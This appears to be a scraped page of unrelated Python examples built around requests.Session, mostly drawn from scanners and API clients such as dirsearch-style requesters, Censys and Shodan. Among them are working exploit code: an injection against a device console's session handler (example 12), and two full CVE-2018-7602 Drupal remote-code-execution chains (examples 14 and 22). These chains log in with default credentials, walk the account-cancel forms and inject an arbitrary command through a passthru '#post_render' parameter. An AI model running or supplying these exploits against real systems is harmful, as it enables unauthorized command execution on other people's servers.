Ejemplo n.º 1
0
    def __init__(self, url="", cookies={}, headers={}, args={}, proxy={}):
        '''
        @params
            url: 目标url
            cookie: 自定义cookie,字符串类型
            headers: http headers, 字典类型
            args: 其他参数, 字典类型
        '''
        self.url = url.strip()
        if self.url:
            formated = URL.format(self.url)
            self.protocol = formated.protocol
            self.uri = formated.uri
            self.host = formated.host
            self.path = formated.path
            self.baseURL = formated.baseURL
            self.params = formated.params
        else:
            self.uri, self.host, self.path, self.baseURL, self.params = "", "", "", "", ""

        self.args = args

        self.http = requests.Session()

        if cookies:
            for key, value in cookies.iteritems():
                self.http.cookies.set(key, value)

        if headers: self.http.headers.update(headers)
        if proxy: self.http.proxies = proxy

        self.register()
Ejemplo n.º 2
0
    def setup(self):
        '''
        To improve dirsearch performance, we resolve the hostname before scanning
        and then send requests by IP instead of hostname, so the library won't have to
        resolve it before every request. This also keeps the scan stable despite any
        issue with the system DNS resolver (running tools like Amass might cause such
        things). If you don't like it, you can disable it with `-b` command-line flag

        Note: A proxy could have a different DNS that would resolve the name. ThereFore.
        resolving the name when using proxy to raise an error is pointless
        '''
        if not self.request_by_hostname and not self.proxy and not self.proxylist:
            try:
                self.ip = self.ip or socket.gethostbyname(self.host)
            except socket.gaierror:
                # Check if hostname resolves to IPv6 address only
                try:
                    self.ip = socket.getaddrinfo(self.host, None,
                                                 socket.AF_INET6)[0][4][0]
                except socket.gaierror:
                    raise RequestException("Couldn't resolve DNS")

            self.url = "{0}://{1}:{2}/".format(
                self.scheme,
                self.ip,
                self.port,
            )

        self.session = requests.Session()
        self.set_adapter()
Ejemplo n.º 3
0
 def __init__(self,
              base_url,
              engine_name,
              domain,
              subdomains=None,
              silent=False,
              verbose=True):
     subdomains = subdomains or []
     self.domain = urlparse.urlparse(domain).netloc
     self.session = requests.Session()
     self.subdomains = []
     self.timeout = 25
     self.base_url = base_url
     self.engine_name = engine_name
     self.silent = silent
     self.verbose = verbose
     self.headers = {
         'User-Agent':
         'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
         'Accept':
         'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
         'Accept-Language': 'en-US,en;q=0.8',
         'Accept-Encoding': 'gzip',
     }
     self.print_banner()
Ejemplo n.º 4
0
    def __init__(self):
        self.maximum = 1000
        self.pmax = 50

        self.sreq = requests.Session()
        self.sreq.headers['User-Agent'] = random_user_agent()

        super(Baidu, self).__init__(_NAME, _SITE, _DESC)
Ejemplo n.º 5
0
    def __init__(self,
                 url,
                 cookie=None,
                 useragent=None,
                 maxPool=1,
                 maxRetries=5,
                 delay=0,
                 timeout=30,
                 ip=None,
                 proxy=None,
                 redirect=False,
                 requestByHostname=False):
        # if no backslash, append one
        if not url.endswith('/'):
            url = url + '/'
        parsed = urllib.parse.urlparse(url)
        self.basePath = parsed.path

        # if not protocol specified, set http by default
        if parsed.scheme != 'http' and parsed.scheme != 'https':
            parsed = urllib.parse.urlparse('http://' + url)
            self.basePath = parsed.path
        self.protocol = parsed.scheme
        if self.protocol != 'http' and self.protocol != 'https':
            self.protocol = 'http'
        self.host = parsed.netloc.split(':')[0]

        # resolve DNS to decrease overhead
        if ip is not None:
            self.ip = ip
        else:
            try:
                self.ip = socket.gethostbyname(self.host)
            except socket.gaierror:
                raise RequestException({'message': "Couldn't resolve DNS"})
        self.headers['Host'] = self.host

        # If no port specified, set default (80, 443)
        try:
            self.port = parsed.netloc.split(':')[1]
        except IndexError:
            self.port = (443 if self.protocol == 'https' else 80)

        # Set cookie and user-agent headers
        if cookie is not None:
            self.setHeader('Cookie', cookie)
        if useragent is not None:
            self.setHeader('User-agent', useragent)
        self.maxRetries = maxRetries
        self.maxPool = maxPool
        self.delay = delay
        self.timeout = timeout
        self.pool = None
        self.proxy = proxy
        self.redirect = redirect
        self.randomAgents = None
        self.requestByHostname = requestByHostname
        self.session = requests.Session()
Ejemplo n.º 6
0
 def _request(self, uri, headers=None, data=None):
     if self.requester is None:
         self.requester = requests.Session()
         self.requester.headers.update(self.headers)
     response = None
     if data is None:
         response = self.requester.get(uri, headers=headers)
     else:
         response = self.requester.get(uri, headers=headers, data=data)
     return response.content
Ejemplo n.º 7
0
 def request(self, method='GET', url='', *args, **kwargs):
     s = requests.Session()
     s.headers.update({
         'User-Agent': ('Mozilla/5.0 (Windows NT 6.1; WOW64) '
                        'AppleWebKit/537.36 (KHTML, like Gecko)'
                        'Chrome/37.0.2062.124 Safari/537.36')
     })
     s.verify = self.verify
     kwargs['timeout'] = self.timeout
     if self.proxy_list:
         proxy = random.choice(self.proxy_list)
         s.proxies = proxy
     req = s.request(method,  url, *args, **kwargs)
     return req
Ejemplo n.º 8
0
 def requests_retry_session(self):
     session = requests.Session()
     retryCount = int(self.retryMaxCount)
     retryBackOff = float(self.retryBackOff)
     statusCodes = list(map(int, self.retryErrorCodes.split(',')))
     print(list(statusCodes));
     retry = Retry(
         total=retryCount,
         read=retryCount,
         connect=retryCount,
         backoff_factor = retryBackOff,
         status_forcelist=statusCodes,
     )
     adapter = HTTPAdapter(max_retries=retry)
     session.mount('http://', adapter)
     session.mount('https://', adapter)
     return session
Ejemplo n.º 9
0
 def __init__(self, api_id=None, api_secret=None, url=None, timeout=None, user_agent_identifier=None):
     self.api_id = api_id or os.environ.get("CENSYS_API_ID", None)
     self.api_secret = api_secret or os.environ.get("CENSYS_API_SECRET", None)
     if not self.api_id or not self.api_secret:
         raise CensysException(401, "No API ID or API secret configured.")
     timeout = timeout or self.DEFAULT_TIMEOUT
     self._api_url = url or os.environ.get("CENSYS_API_URL", None) or self.DEFAULT_URL
     # create a session that we'll use for making requests
     self._session = requests.Session()
     self._session.auth = (self.api_id, self.api_secret)
     self._session.timeout = timeout
     self._session.headers.update({
         "accept": "application/json, */8",
         "User-Agent": ' '.join(
             [requests.utils.default_user_agent(), user_agent_identifier or self.DEFAULT_USER_AGENT])
     })
     # test that everything works by requesting the users account information
     self.account()
Ejemplo n.º 10
0
def sacn(target):
    try:
        r = requests.Session().get(str(target),
                                   headers=header,
                                   timeout=TimeOut)
        status = r.status_code
        title = re.search(r'<title>(.*)</title>', r.text)  #get the title
        if title:
            title = title.group(1).strip().strip("\r").strip("\n")[:30]
        else:
            title = "None"
        banner = ''
        try:
            banner += r.headers['Server'][:20]  #get the server banner
        except:
            pass
        return "Status>%s|Server>%s|Title>%s" % (status, banner, title)
    except Exception, e:
        pass
Ejemplo n.º 11
0
    def __init__(self, url="", cookie="", headers={}, elseArgs={}):
        self.url = url.strip()
        if self.url:
            formated = URL.format(self.url)
            self.uri = formated.uri
            self.host = formated.host
            self.path = formated.path
            self.baseURL = formated.baseURL
            self.params = formated.params
        else:
            self.uri, self.host, self.path, self.baseURL, self.params = "", "", "", "", ""
        self.elseArgs = elseArgs

        cookie = cookie.strip()
        self.http = requests.Session()
        if cookie:
            for item in _strCookie2Dict(cookie):
                self.http.cookies.set(item['name'], item['value'])

        self.http.headers.update(headers)

        self.register()
Ejemplo n.º 12
0
def exploit(target, headers=None):
    log.process("Requesting target site:" + target)
    create_session_url = '{}/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337";'.format(
        target)
    verify_url = '{}/php/utils/debug.php'.format(target)

    session = requests.Session()
    if 'https' in target:
        session.get(verify_url, verify=False)
        session.get(create_session_url, verify=False)
        verify = session.get(verify_url, verify=False)
    else:
        session.get(verify_url)
        session.get(create_session_url)
        verify = session.get(verify_url)

    if 'Debug Console' in verify.text:
        res = '{} is vul'.format(target)
    else:
        res = '{} is not vul'.format(target)

    return res
Ejemplo n.º 13
0
    def __init__(self, key, proxies=None):
        """Initializes the API object.

        :param key: The Shodan API key.
        :type key: str
        :param proxies: A proxies array for the requests library, e.g. {'https': 'your proxy'}
        :type proxies: dict
        """
        self.api_key = key
        self.base_url = 'https://api.shodan.io'
        self.base_exploits_url = 'https://exploits.shodan.io'
        self.data = self.Data(self)
        self.dns = self.Dns(self)
        self.exploits = self.Exploits(self)
        self.labs = self.Labs(self)
        self.notifier = self.Notifier(self)
        self.org = self.Organization(self)
        self.tools = self.Tools(self)
        self.stream = Stream(key, proxies=proxies)
        self._session = requests.Session()
        if proxies:
            self._session.proxies.update(proxies)
            self._session.trust_env = False
Ejemplo n.º 14
0
 def cve_2018_7602_exp(self, cmd):
     vul_name = "Drupal: CVE-2018-7602"
     DRUPAL_U = "admin"
     DRUPAL_P = "admin"
     try:
         self.session = requests.Session()
         self.get_params = {'q': 'user/login'}
         self.post_params = {
             'form_id': 'user_login',
             'name': DRUPAL_U,
             'pass': DRUPAL_P,
             'op': 'Log in'
         }
         self.session.post(self.url,
                           params=self.get_params,
                           data=self.post_params,
                           headers=self.headers,
                           timeout=self.timeout,
                           verify=False)
         self.get_params = {'q': 'user'}
         self.r = self.session.get(self.url,
                                   params=self.get_params,
                                   headers=self.headers,
                                   timeout=self.timeout,
                                   verify=False)
         self.soup = BeautifulSoup(self.r.text, "html.parser")
         self.user_id = self.soup.find('meta', {
             'property': 'foaf:name'
         }).get('about')
         if "?q=" in self.user_id:
             self.user_id = self.user_id.split("=")[1]
         self.get_params = {'q': self.user_id + '/cancel'}
         self.r = self.session.get(self.url,
                                   params=self.get_params,
                                   headers=self.headers,
                                   timeout=self.timeout,
                                   verify=False)
         self.soup = BeautifulSoup(self.r.text, "html.parser")
         self.form = self.soup.find('form',
                                    {'id': 'user-cancel-confirm-form'})
         self.form_token = self.form.find('input', {
             'name': 'form_token'
         }).get('value')
         self.get_params = {
             'q':
             self.user_id + '/cancel',
             'destination':
             self.user_id +
             '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]='
             + cmd
         }
         self.post_params = {
             'form_id': 'user_cancel_confirm_form',
             'form_token': self.form_token,
             '_triggering_element_name': 'form_id',
             'op': 'Cancel account'
         }
         self.r = self.session.post(self.url,
                                    params=self.get_params,
                                    data=self.post_params,
                                    headers=self.headers,
                                    timeout=self.timeout,
                                    verify=False)
         self.soup = BeautifulSoup(self.r.text, "html.parser")
         self.form = self.soup.find('form',
                                    {'id': 'user-cancel-confirm-form'})
         self.form_build_id = self.form.find('input', {
             'name': 'form_build_id'
         }).get('value')
         self.get_params = {
             'q':
             'file/ajax/actions/cancel/#options/path/' + self.form_build_id
         }
         self.post_params = {'form_build_id': self.form_build_id}
         self.r = self.session.post(self.url,
                                    params=self.get_params,
                                    data=self.post_params,
                                    headers=self.headers,
                                    timeout=self.timeout,
                                    verify=False)
         self.raw_data = dump.dump_all(self.r).decode('utf-8', 'ignore')
         verify.exploit_print(self.r.text, self.raw_data)
     except requests.exceptions.Timeout:
         verify.timeout_print(vul_name)
     except requests.exceptions.ConnectionError:
         verify.connection_print(vul_name)
     except Exception:
         verify.error_print(vul_name)
Ejemplo n.º 15
0
    def __init__(self,
                 url,
                 script_path,
                 cookie=None,
                 useragent=None,
                 maxPool=1,
                 maxRetries=5,
                 delay=0,
                 timeout=30,
                 ip=None,
                 proxy=None,
                 redirect=False,
                 requestByHostname=False,
                 httpmethod="get"):

        self.httpmethod = httpmethod
        self.script_path = script_path

        # if no backslash, append one
        # if not url.endswith('/'):
        #     url = url + '/'
        # http://hostname.local add slash
        if urllib.parse.urlparse(url).path == '':
            url = url + '/'

        parsed = urllib.parse.urlparse(url)
        self.basePath = parsed.path

        url_type, suffix, directory_name, filename, base_path = self.getURLTypeAndSuffix(
            self.basePath)
        self.url_type = url_type
        self.extension = suffix
        self.directory = directory_name
        self.filename = filename
        if base_path:
            self.base_path = base_path
        else:
            self.base_path = '/'
        if self.extension:
            self.site_fingerprint = set([self.extension])
        else:
            self.site_fingerprint = set([])

        if self.url_type == URLType.normal_file:
            self.scan_dict = Dict4URLType.normal_file
        elif self.url_type == URLType.normal_restful_dir:
            self.scan_dict = Dict4URLType.normal_restful_dir
        elif self.url_type == URLType.restful_file:
            self.scan_dict = Dict4URLType.restful_file

        # if not protocol specified, set http by default
        if parsed.scheme != 'http' and parsed.scheme != 'https':
            parsed = urllib.parse.urlparse('http://' + url)
            self.basePath = parsed.path

        self.protocol = parsed.scheme

        if self.protocol != 'http' and self.protocol != 'https':
            self.protocol = 'http'

        self.host = parsed.netloc.split(':')[0]

        # resolve DNS to decrease overhead
        if ip is not None:
            self.ip = ip
        else:
            try:
                self.ip = socket.gethostbyname(self.host)
            except socket.gaierror:
                raise RequestException({'message': "Couldn't resolve DNS"})

        self.headers['Host'] = self.host

        # If no port specified, set default (80, 443)
        try:
            self.port = parsed.netloc.split(':')[1]
        except IndexError:
            self.port = (443 if self.protocol == 'https' else 80)

        # Set cookie and user-agent headers
        if cookie is not None:
            self.setHeader('Cookie', cookie)

        if useragent is not None:
            self.setHeader('User-agent', useragent)

        self.maxRetries = maxRetries
        self.maxPool = maxPool
        self.delay = delay
        self.timeout = timeout
        self.pool = None
        self.proxy = proxy
        self.redirect = redirect
        self.randomAgents = None
        self.requestByHostname = requestByHostname
        self.session = requests.Session()
Ejemplo n.º 16
0
 def __init__(self, file_url, session=None):
     self.session = session or requests.Session()
     requested_file = self._request_for_file(file_url)
     self.len = int(requested_file.headers['content-length'])
     self.raw_data = requested_file.raw
Ejemplo n.º 17
0
    def __init__(
        self,
        url,
        cookie=None,
        useragent=None,
        maxPool=1,
        maxRetries=5,
        delay=0,
        timeout=30,
        ip=None,
        proxy=None,
        proxylist=None,
        redirect=False,
        requestByHostname=False,
        httpmethod="get",
    ):
        self.httpmethod = httpmethod

        # if no backslash, append one
        if not url.endswith("/"):
            url += "/"

        parsed = urllib.parse.urlparse(url)
        self.basePath = parsed.path

        # if not protocol specified, set http by default
        if parsed.scheme not in ["https", "http"]:
            parsed = urllib.parse.urlparse("http://" + url)
            self.basePath = parsed.path

        self.protocol = parsed.scheme

        if self.protocol not in ["https", "http"]:
            self.protocol = "http"

        self.host = parsed.netloc.split(":")[0]

        # resolve DNS to decrease overhead
        if ip is not None:
            self.ip = ip
        else:
            try:
                self.ip = socket.gethostbyname(self.host)
            except socket.gaierror:
                raise RequestException({"message": "Couldn't resolve DNS"})

        self.headers["Host"] = self.host

        # If no port specified, set default (80, 443)
        try:
            self.port = parsed.netloc.split(":")[1]
        except IndexError:
            self.port = 443 if self.protocol == "https" else 80

        # Set cookie and user-agent headers
        if cookie is not None:
            self.setHeader("Cookie", cookie)

        if useragent is not None:
            self.setHeader("User-agent", useragent)

        self.maxRetries = maxRetries
        self.maxPool = maxPool
        self.delay = delay
        self.timeout = timeout
        self.pool = None
        self.proxy = proxy
        self.proxylist = proxylist
        self.redirect = redirect
        self.randomAgents = None
        self.requestByHostname = requestByHostname
        self.session = requests.Session()
Ejemplo n.º 18
0
    def __init__(
        self,
        url,
        cookie=None,
        useragent=None,
        maxPool=1,
        maxRetries=5,
        delay=0,
        timeout=20,
        ip=None,
        proxy=None,
        proxylist=None,
        redirect=False,
        requestByHostname=False,
        httpmethod="get",
        data=None,
    ):
        self.httpmethod = httpmethod
        self.data = data

        # if no backslash, append one
        if not url.endswith("/"):
            url += "/"

        parsed = urllib.parse.urlparse(url)

        self.basePath = parsed.path.lstrip("/")

        # If no protocol specified, set http by default
        if not parsed.scheme:
            parsed = urllib.parse.urlparse("http://" + url)
        # If protocol is not supported
        elif parsed.scheme not in ["https", "http"]:
            raise RequestException({"message": "Unsupported URL scheme: {0}".format(parsed.scheme)})

        self.basePath = parsed.path
        self.protocol = parsed.scheme
        self.host = parsed.netloc.split(":")[0]

        # resolve DNS to decrease overhead
        if ip:
            self.ip = ip
        else:
            try:
                self.ip = socket.gethostbyname(self.host)
            except socket.gaierror:
                raise RequestException({"message": "Couldn't resolve DNS"})

        # If no port specified, set default (80, 443)
        try:
            self.port = int(parsed.netloc.split(":")[1])
        except IndexError:
            self.port = 443 if self.protocol == "https" else 80
        except ValueError:
            raise RequestException(
                {"message": "Invalid port number: {0}".format(parsed.netloc.split(":")[1])}
            )

        # Pass if the host header has already been set
        if "host" not in [hd.lower() for hd in self.headers]:
            self.headers["Host"] = self.host

            # Include port in Host header if it's non-standard
            if (self.protocol == "https" and self.port != 443) or (
                self.protocol == "http" and self.port != 80
            ):
                self.headers["Host"] += ":{0}".format(self.port)

        # Set cookie and user-agent headers
        if cookie:
            self.setHeader("Cookie", cookie)

        if useragent:
            self.setHeader("User-agent", useragent)

        self.maxRetries = maxRetries
        self.maxPool = maxPool
        self.delay = delay
        self.timeout = timeout
        self.pool = None
        self.proxy = proxy
        self.proxylist = proxylist
        self.redirect = redirect
        self.randomAgents = None
        self.requestByHostname = requestByHostname
        self.session = requests.Session()
        self.url = "{0}://{1}:{2}".format(self.protocol, self.host if self.requestByHostname else self.ip, self.port)
Ejemplo n.º 19
0
    def __init__(
        self,
        url,
        max_pool=1,
        max_retries=5,
        timeout=20,
        ip=None,
        proxy=None,
        proxylist=None,
        redirect=False,
        request_by_hostname=False,
        httpmethod="get",
        data=None,
        scheme=None,
    ):
        self.httpmethod = httpmethod
        self.data = data
        self.headers = {}

        parsed = urlparse(url)

        # If no protocol specified, set http by default
        if "://" not in url:
            parsed = urlparse("{0}://{1}".format(scheme, url))

        # If protocol is not supported
        elif parsed.scheme not in ["https", "http"]:
            raise RequestException({
                "message":
                "Unsupported URL scheme: {0}".format(parsed.scheme)
            })

        self.base_path = parsed.path
        if parsed.path.startswith("/"):
            self.base_path = parsed.path[1:]

        # Safe quote all special characters in base_path to prevent from being encoded
        self.base_path = safequote(self.base_path)
        self.protocol = parsed.scheme
        self.host = parsed.netloc.split(":")[0]

        # Resolve DNS to decrease overhead
        if ip:
            self.ip = ip
        # A proxy could have a different DNS that would resolve the name. ThereFore.
        # resolving the name when using proxy to raise an error is pointless
        elif not proxy and not proxylist:
            try:
                self.ip = socket.gethostbyname(self.host)
            except socket.gaierror:
                # Check if hostname resolves to IPv6 address only
                try:
                    self.ip = socket.getaddrinfo(self.host, None,
                                                 socket.AF_INET6)[0][4][0]
                except socket.gaierror:
                    raise RequestException({"message": "Couldn't resolve DNS"})

        # If no port specified, set default (80, 443)
        try:
            self.port = int(parsed.netloc.split(":")[1])
        except IndexError:
            self.port = 443 if self.protocol == "https" else 80
        except ValueError:
            raise RequestException({
                "message":
                "Invalid port number: {0}".format(parsed.netloc.split(":")[1])
            })

        # Set the Host header, this will be overwritten if the user has already set the header
        self.headers["Host"] = self.host

        # Include port in Host header if it's non-standard
        if (self.protocol == "https"
                and self.port != 443) or (self.protocol == "http"
                                          and self.port != 80):
            self.headers["Host"] += ":{0}".format(self.port)

        self.max_retries = max_retries
        self.max_pool = max_pool
        self.timeout = timeout
        self.pool = None
        self.proxy = proxy
        self.proxylist = proxylist
        self.redirect = redirect
        self.random_agents = None
        self.auth = None
        self.request_by_hostname = request_by_hostname
        self.session = requests.Session()
        self.url = "{0}://{1}:{2}/".format(
            self.protocol,
            self.host if self.request_by_hostname else self.ip,
            self.port,
        )
        self.base_url = "{0}://{1}:{2}/".format(
            self.protocol,
            self.host,
            self.port,
        )
        self.set_adapter()
Ejemplo n.º 20
0
 def __init__(self, verbose=False, session=None):
     self.verbose = verbose
     if not session:
         self.session = requests.Session()
     else:
         self.session = session
Ejemplo n.º 21
0
    def __init__(
        self,
        url,
        maxPool=1,
        maxRetries=5,
        timeout=20,
        ip=None,
        proxy=None,
        proxylist=None,
        redirect=False,
        requestByHostname=False,
        httpmethod="get",
        data=None,
        scheme=None,
    ):
        self.httpmethod = httpmethod
        self.data = data
        self.headers = {}

        # If no backslash, append one
        if not url.endswith("/"):
            url += "/"

        parsed = urllib.parse.urlparse(url)

        # If no protocol specified, set http by default
        if "://" not in url:
            parsed = urllib.parse.urlparse("{0}://{1}".format(scheme, url))

        # If protocol is not supported
        elif parsed.scheme not in ["https", "http"]:
            raise RequestException({"message": "Unsupported URL scheme: {0}".format(parsed.scheme)})

        if parsed.path.startswith("/"):
            self.basePath = parsed.path[1:]
        else:
            self.basePath = parsed.path

        # Safe quote all special characters in basePath to prevent from being encoded when performing requests
        self.basePath = urllib.parse.quote(self.basePath, safe="!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~")
        self.protocol = parsed.scheme
        self.host = parsed.netloc.split(":")[0]

        # Resolve DNS to decrease overhead
        if ip:
            self.ip = ip
        # A proxy could have a different DNS that would resolve the name. Therefore,
        # resolving the name when using proxy to raise an error is pointless
        elif not proxy and not proxylist:
            try:
                self.ip = socket.gethostbyname(self.host)
            except socket.gaierror:
                raise RequestException({"message": "Couldn't resolve DNS"})

        # If no port specified, set default (80, 443)
        try:
            self.port = int(parsed.netloc.split(":")[1])
        except IndexError:
            self.port = 443 if self.protocol == "https" else 80
        except ValueError:
            raise RequestException(
                {"message": "Invalid port number: {0}".format(parsed.netloc.split(":")[1])}
            )

        # Set the Host header, this will be overwritten if the user has already set the header
        self.headers["Host"] = self.host

        # Include port in Host header if it's non-standard
        if (self.protocol == "https" and self.port != 443) or (
            self.protocol == "http" and self.port != 80
        ):
            self.headers["Host"] += ":{0}".format(self.port)

        self.maxRetries = maxRetries
        self.maxPool = maxPool
        self.timeout = timeout
        self.pool = None
        self.proxy = proxy
        self.proxylist = proxylist
        self.redirect = redirect
        self.randomAgents = None
        self.requestByHostname = requestByHostname
        self.session = requests.Session()
        self.url = "{0}://{1}:{2}/".format(
            self.protocol,
            self.host if self.requestByHostname else self.ip,
            self.port,
        )
Ejemplo n.º 22
0
 def cve_2018_7602_poc(self):
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Drupal: CVE-2018-7602"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "null"
     self.vul_info[
         "vul_name"] = "Drupal drupalgeddon2 remote code execution"
     self.vul_info["vul_numb"] = "CVE-2018-7602"
     self.vul_info["vul_apps"] = "Drupal"
     self.vul_info["vul_date"] = "2018-06-19"
     self.vul_info["vul_vers"] = "< 7.59, < 8.5.3"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "远程代码执行"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "这个漏洞是CVE-2018-7600的绕过利用,两个漏洞原理是一样的。" \
                                 "攻击者可以通过不同方式利用该漏洞远程执行代码。" \
                                 "CVE-2018-7602这个漏洞是CVE-2018-7600的另一个利用点,只是入口方式不一样。"
     self.vul_info["cre_date"] = "2021-01-29"
     self.vul_info["cre_auth"] = "zhzyker"
     DRUPAL_U = "admin"
     DRUPAL_P = "admin"
     md = random_md5()
     cmd = "echo " + md
     try:
         self.session = requests.Session()
         self.get_params = {'q': 'user/login'}
         self.post_params = {
             'form_id': 'user_login',
             'name': DRUPAL_U,
             'pass': DRUPAL_P,
             'op': 'Log in'
         }
         self.session.post(self.url,
                           params=self.get_params,
                           data=self.post_params,
                           headers=self.headers,
                           timeout=self.timeout,
                           verify=False)
         self.get_params = {'q': 'user'}
         self.r = self.session.get(self.url,
                                   params=self.get_params,
                                   headers=self.headers,
                                   timeout=self.timeout,
                                   verify=False)
         self.soup = BeautifulSoup(self.r.text, "html.parser")
         self.user_id = self.soup.find('meta', {
             'property': 'foaf:name'
         }).get('about')
         if "?q=" in self.user_id:
             self.user_id = self.user_id.split("=")[1]
         self.get_params = {'q': self.user_id + '/cancel'}
         self.r = self.session.get(self.url,
                                   params=self.get_params,
                                   headers=self.headers,
                                   timeout=self.timeout,
                                   verify=False)
         self.soup = BeautifulSoup(self.r.text, "html.parser")
         self.form = self.soup.find('form',
                                    {'id': 'user-cancel-confirm-form'})
         self.form_token = self.form.find('input', {
             'name': 'form_token'
         }).get('value')
         self.get_params = {
             'q':
             self.user_id + '/cancel',
             'destination':
             self.user_id +
             '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]='
             + cmd
         }
         self.post_params = {
             'form_id': 'user_cancel_confirm_form',
             'form_token': self.form_token,
             '_triggering_element_name': 'form_id',
             'op': 'Cancel account'
         }
         self.r = self.session.post(self.url,
                                    params=self.get_params,
                                    data=self.post_params,
                                    headers=self.headers,
                                    timeout=self.timeout,
                                    verify=False)
         self.soup = BeautifulSoup(self.r.text, "html.parser")
         self.form = self.soup.find('form',
                                    {'id': 'user-cancel-confirm-form'})
         self.form_build_id = self.form.find('input', {
             'name': 'form_build_id'
         }).get('value')
         self.get_params = {
             'q':
             'file/ajax/actions/cancel/#options/path/' + self.form_build_id
         }
         self.post_params = {'form_build_id': self.form_build_id}
         self.r = self.session.post(self.url,
                                    params=self.get_params,
                                    data=self.post_params,
                                    headers=self.headers,
                                    timeout=self.timeout,
                                    verify=False)
         if md in misinformation(self.r.text, md):
             self.vul_info["vul_data"] = dump.dump_all(self.r).decode(
                 'utf-8', 'ignore')
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info[
                 "vul_payd"] = '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]=' + cmd
             self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]"
         else:
             self.request = requests.get(self.url + "/CHANGELOG.txt",
                                         data=self.payload,
                                         headers=self.headers,
                                         timeout=self.timeout,
                                         verify=False)
             self.rawdata = dump.dump_all(self.request).decode(
                 'utf-8', 'ignore')
             self.allver = re.findall(r"([\d][.][\d]?[.]?[\d])",
                                      self.request.text)
             if self.request.status_code == 200 and r"Drupal" in self.request.text:
                 if '7.59' not in self.allver and '8.5.3' not in self.allver:
                     self.vul_info["vul_data"] = dump.dump_all(
                         self.r).decode('utf-8', 'ignore')
                     self.vul_info["prt_resu"] = "PoC_MaYbE"
                     self.vul_info[
                         "vul_payd"] = '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]=' + cmd
                     self.vul_info[
                         "prt_info"] = "[maybe] [rce] [cmd:" + cmd + "]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as error:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()